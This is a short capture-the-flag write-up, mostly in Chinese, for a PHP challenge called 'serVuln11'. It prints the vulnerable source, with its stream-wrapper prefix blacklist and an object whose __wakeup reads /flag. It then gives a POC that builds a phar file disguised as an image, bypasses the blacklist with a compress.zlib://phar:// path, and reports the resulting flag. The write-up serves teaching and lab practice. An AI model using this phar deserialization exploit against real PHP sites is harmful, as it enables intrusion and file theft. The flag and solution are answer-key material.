serVuln11 a phar trick

源码

<?php
error_reporting(0);
class Aquarius
{
    public function __wakeup()
    {
        printf("%s\n", __METHOD__);
        echo file_get_contents('/flag');
    }
}

function Check($filename)
{
    $mark = true;
    $black_list = ['php', 'file', 'glob', 'data', 'http', 'ftp', 'zip', 'https', 'ftps', 'phar'];
    printf("%s\n", __METHOD__);
    foreach ($black_list as $item) {
        $front = substr($filename, 0, strlen($item));
        if ($front == $item) {
            $mark = false;
            break;
        }
    }
    return $mark;
}

if (isset($_REQUEST['Aquarius'])) {
    $filename = $_REQUEST['Aquarius'];
    if (Check($filename)) {
        echo md5_file($filename);
    } else {
        echo "服务器检测到可疑前缀，启动了查杀程序";
    }
} else {
    echo "系统检测发现该处漏洞，进行攻击测试\n";
}
?> 

POC

<?php
error_reporting(0);
class Aquarius{
}

@unlink("aqu.phar");
$phar = new Phar("aqu.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$aqu = new Aquarius();
$phar->setMetadata($aqu);
$phar->addFromString("aqu.txt", "CSSEC");
$phar->stopBuffering();

保证phar.readonly=Off，运行POC.php，生成aqu.phar，更改后缀名为.png上传，返回路径uploads/aqu.png，访问index.php，由于过滤参数首部的phar字符串，传入参数compress.zlib://phar://uploads/aqu.png

得到

Check
Aquarius::__wakeup
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}